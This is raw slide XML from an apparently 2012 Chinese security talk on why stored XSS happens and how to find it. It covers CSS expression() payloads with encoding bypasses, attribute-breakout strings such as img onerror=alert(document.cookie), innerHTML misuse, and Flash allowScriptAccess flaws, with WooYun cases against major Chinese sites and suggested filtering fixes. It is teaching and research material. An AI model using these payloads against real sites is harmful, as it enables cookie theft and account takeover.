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6" r:id="rId19"/>
    <p:sldId id="275" r:id="rId20"/>
    <p:sldId id="278" r:id="rId21"/>
    <p:sldId id="273" r:id="rId22"/>
    <p:sldId id="279" r:id="rId23"/>
    <p:sldId id="280" r:id="rId24"/>
    <p:sldId id="274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18"/>
    <a:srgbClr val="B2CB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1388-5124-457C-891D-932749DD543F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AAE4-2D85-4B2A-A50A-34DEFC87C3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77D8-6BE3-4D58-8477-ED9DDC410FE5}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr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571612"/>
            <a:ext cx="59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存储</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>的成因及挖掘方法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2786058"/>
            <a:ext cx="4400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USERID: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Gainover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  (g_@live.com)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GROUP:  PKAV Group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464344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2012-7-28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7425" y="6286520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www.pkav.net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5503" y="6286520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| www.wooyun.org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891" y="6286520"/>
            <a:ext cx="21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| www.toolmao.com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83210" cy="461665"/>
            <a:chOff x="500034" y="285728"/>
            <a:chExt cx="478321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426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CSS-Context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3286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1418" y="3648678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通常情况下，可能会将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&lt;, &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>过滤掉了，因而无法使用此方式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418" y="2148480"/>
            <a:ext cx="58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如果未做过滤，可以用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>&lt;/style&gt;&lt;style&gt; … </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>的方式来调用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1418" y="1648414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CSS-Context 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的利用方式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>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18" y="2719984"/>
            <a:ext cx="472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418" y="4791686"/>
            <a:ext cx="4057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1418" y="4148744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直接根据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上下文构造闭合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2012" y="4648810"/>
            <a:ext cx="3520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类型对输出进行严格纠正</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>例如：字体大小，必须为数字，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>图片地址不允许出现非法字符</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13" descr="http://www.aiimg.com/pic/png/200901/png_576/aiimg_com_576_liulanqi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285728"/>
            <a:ext cx="928694" cy="92869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572396" y="5714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IE 6, 7, 8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5857892"/>
            <a:ext cx="50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wooyun-2010-05967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0034" y="622722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wooyun-2010-01101 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>呆子不开口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网易微博换肤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3" y="6131502"/>
            <a:ext cx="391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dirty="0" smtClean="0"/>
              <a:t>5. http://zone.wooyun.org/content/465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0034" y="285728"/>
            <a:ext cx="4783210" cy="461665"/>
            <a:chOff x="500034" y="285728"/>
            <a:chExt cx="4783210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857224" y="285728"/>
              <a:ext cx="4426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CSS-Context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857232"/>
            <a:ext cx="746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&lt;style&gt;….&lt;/style&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>中可以被写入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数据之外，还有其它位置也可以：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3" y="4078433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2.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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data:,*%7bx:expression(if(!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)%7balert(1);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=1%7d)%7d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>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3" y="476278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3. &lt;style&gt;@import "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data:,*%7bx:expression(if(!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)%7balert(1);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=1%7d)%7D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>";&lt;/style&gt;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3" y="1357298"/>
            <a:ext cx="731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&lt;div style="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>width:expression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3" y="5447143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4. &lt;div style="font-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>family:foo</a:t>
            </a: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r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>expression(if(!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=1});"&gt;XXX&lt;/div&gt;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3" y="1764654"/>
            <a:ext cx="717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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>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0033" y="2172010"/>
            <a:ext cx="749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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/**/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>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0033" y="2579366"/>
            <a:ext cx="735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width:express</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\69</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>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0033" y="2986722"/>
            <a:ext cx="735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width:express</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\69</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>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33" y="3394078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&lt;div style="w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;#105;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>dth:express</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;#x0069;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>on(if(!w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;#x69;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ndow.x){alert(1);w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;#x069;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ndow.x=1})"&gt;&lt;/div&gt;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6143644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的最爱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0800000">
            <a:off x="4581244" y="6170538"/>
            <a:ext cx="642942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86380" y="326069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部分内容参考</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>html5sec.org)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71934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数据输出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3571868" y="1142984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034" y="1785926"/>
            <a:ext cx="378621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我是输出 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72066" y="1785926"/>
            <a:ext cx="378621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="" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>picurl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>我是输出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>"&gt;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3286116" y="264318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5143504" y="114298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5250661" y="2607463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43174" y="3286124"/>
            <a:ext cx="428628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x=$("x").value;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x=$("x").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picurl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43174" y="5143512"/>
            <a:ext cx="4286280" cy="1214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("("+x+")");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>$("result").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=x;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4357686" y="4572008"/>
            <a:ext cx="428628" cy="4286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1472" y="45720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714480" y="4000504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3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1709925" y="4756674"/>
            <a:ext cx="718935" cy="67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4433327" y="1785926"/>
            <a:ext cx="500066" cy="50006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1" name="Picture 1" descr="C:\Users\ADMINI~1\AppData\Local\Temp\F9$DM2OPK_[95A{T}$N6Y6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286388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Picture 1" descr="C:\Users\ADMINI~1\AppData\Local\Temp\F9$DM2OPK_[95A{T}$N6Y6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357562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9843"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="428596" y="1071546"/>
            <a:ext cx="3271835" cy="2609850"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3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214810" y="785794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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>字段是昵称，我们可以自行设置！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12144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接着我们做以下测试：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1643050"/>
            <a:ext cx="446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Gainover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Gainover&amp;lt;iframe&amp;gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>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214311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JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>熟悉一点的则可能想到：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 bwMode="auto">
          <a:xfrm>
            <a:off x="4286250" y="2571744"/>
            <a:ext cx="4572030" cy="105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357818" y="378619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于是，我们测试引号是否被过滤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean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3570" y="4214818"/>
            <a:ext cx="307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Gainover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>"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Gainover&amp;quot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>;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643834" y="485776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9586" y="5857892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放弃？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="乘号 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7786710" y="4929198"/>
            <a:ext cx="428628" cy="42862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6143636" y="5072074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6380" y="5857892"/>
            <a:ext cx="25046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data=$("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").value;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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 r="5353"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="428596" y="4071942"/>
            <a:ext cx="4714908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98247" y="6417254"/>
            <a:ext cx="48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wooyun-2010-09732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百度首页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后门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8564" y="100010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这一类漏洞经常出现的场景</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>…..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64" y="1571612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点击查看大图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点击播放音乐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自动播放音乐。。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64" y="207167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id="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zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>小图地址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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://xxx.com/1.jpg&amp;quot;&amp;gt;&amp;lt;img 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=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=alert(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document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lt;i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> b= 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="test()"&gt;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8574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当用户点击查看大图的时候，执行的代码往往是：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64" y="328612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test(){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alert($("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"));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$("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>bigimage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="&lt;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=\""+$("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")+"\"/&gt;";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071810"/>
            <a:ext cx="280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flipV="1">
            <a:off x="5072066" y="342900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4643446"/>
            <a:ext cx="44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wooyun-2010-02490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腾讯微博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034" y="5131370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wooyun-2010-03317 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>gainover,QQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>邮箱音乐功能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845750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共同点：读取自定义属性，然后进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>操作。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628652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解决方案：在读取属性之后，对属性中的特殊字符进行二次过滤。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928670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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>="\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>uXXXX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>引发的惨案</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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366" y="1397639"/>
            <a:ext cx="52197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直接箭头连接符 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3714744" y="2214554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2285984" y="314324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5286388"/>
            <a:ext cx="564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wooyun-2010-08487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腾讯</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>WEBQQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>聊天功能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4826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实际案例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1428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大多数厂商的做法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19288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\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\\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6171" y="23574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\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0976" y="2772611"/>
            <a:ext cx="303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data.name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>进行二次过滤，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>替换</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&lt; , &gt;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 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5715016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wooyun-2010-010167 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>imlonghao</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>搜狐微博 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28596" y="928670"/>
            <a:ext cx="5429288" cy="785818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8596" y="5000636"/>
            <a:ext cx="5429288" cy="142876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7158" y="3143248"/>
            <a:ext cx="10480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Flash XSS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428728" y="264318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428728" y="342900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5984" y="3929066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5984" y="2500306"/>
            <a:ext cx="8771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endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="右弧形箭头 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3428992" y="2714620"/>
            <a:ext cx="571504" cy="1285884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3372" y="3143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正常的存储行为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114298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图片上传组件，视频播放器，音乐播放器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>… 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2500298" y="1857364"/>
            <a:ext cx="428628" cy="4286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500298" y="4446782"/>
            <a:ext cx="428628" cy="42862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85852" y="507207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日志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未过滤，或过滤不严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30396" y="550070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相册，对加载图片未判断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99299" y="592933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其它一些有加载图片功能的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00760" y="264318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29454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第三方插件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072198" y="33575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16" y="3214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第三方应用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00760" y="3500438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58016" y="24288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sameDomain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928670"/>
            <a:ext cx="301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常规的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Flash-based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4572000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&lt;embed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r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>" quality="high" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>bgcolor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>="#FFFFFF" width="950" height="250" name="chart" align="middle" </a:t>
            </a:r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tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>always</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>" type="application/x-shockwave-flash" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>pluginspage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>="http://www.macromedia.com/go/getflashplayer" id="chart"&gt;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1357298"/>
            <a:ext cx="322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最低级的漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Always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地址任何填写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5997379"/>
            <a:ext cx="528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wooyun-2010-07684 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空间礼物功能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>wooyun-2010-08354 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百度贴吧存储型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="下箭头 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6500826" y="2285992"/>
            <a:ext cx="500066" cy="100013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7818" y="357187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稍微进化一点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Always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地址固定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会调用外部图片或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SWF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472" y="3714752"/>
            <a:ext cx="150019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正常的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>FLASH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14546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643306" y="3714752"/>
            <a:ext cx="150019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恶意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>FLASH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14678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472" y="4857760"/>
            <a:ext cx="22941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olidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xxx.jpg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02833" y="3759296"/>
            <a:ext cx="500066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2285984" y="442913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43240" y="4857760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读取配置文件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V="1">
            <a:off x="3107521" y="439341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429256" y="4857760"/>
            <a:ext cx="3000396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&lt;profile&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&lt;head&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>xxx.jpg</a:t>
            </a:r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&lt;/profile&gt;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>
            <a:off x="4857752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6572264" y="5929330"/>
            <a:ext cx="500066" cy="71438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4237" y="5425875"/>
            <a:ext cx="470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wooyun-2010-01768 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>p.z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新浪微博存储型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>wooyun-2010-01634 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>p.z</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>百度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贴吧存储型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标注 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5500694" y="214290"/>
            <a:ext cx="3429024" cy="857256"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -39657"/>
              <a:gd name="adj2" fmla="val 65189"/>
            </a:avLst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72000" y="1214422"/>
            <a:ext cx="422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再次进化一点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sameDomain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同域名下反射型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1000108"/>
            <a:ext cx="18806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sameDomain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428860" y="16430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1857364"/>
            <a:ext cx="354135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只允许使用同域名下的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000232" y="250030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4286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无法执行了吧～，高枕无忧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3214678" y="242886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8992" y="3071810"/>
            <a:ext cx="30796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同域名下的缺陷型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3071810"/>
            <a:ext cx="30796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不同域名下的恶意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1464447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monster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643446"/>
            <a:ext cx="1750596" cy="1750596"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="图片 22" descr="mons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1785926"/>
            <a:ext cx="1393406" cy="1393406"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="上弧形箭头 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19989031" flipH="1">
            <a:off x="6106652" y="2388888"/>
            <a:ext cx="857256" cy="35719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8082" y="314324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程序员 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7224" y="628652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程序员 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4357686" y="4357694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4876" y="5357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被恶意利用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33" name="图片 32" descr="monster_0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9454" y="3786190"/>
            <a:ext cx="1750596" cy="1750596"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="右弧形箭头 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="7273663">
            <a:off x="6253731" y="4014394"/>
            <a:ext cx="428628" cy="1000132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3500438"/>
            <a:ext cx="30796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同域名下允许上传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00958" y="5572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某黑客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57554" y="5929330"/>
            <a:ext cx="432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wooyun-2010-03314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7554" y="6286520"/>
            <a:ext cx="502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wooyun-2010-06103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8883" y="312622"/>
            <a:ext cx="333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sameDomain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>allowscriptaccess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4282" y="2857496"/>
            <a:ext cx="3357586" cy="1000132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87680" y="2857496"/>
            <a:ext cx="4456220" cy="1000132"/>
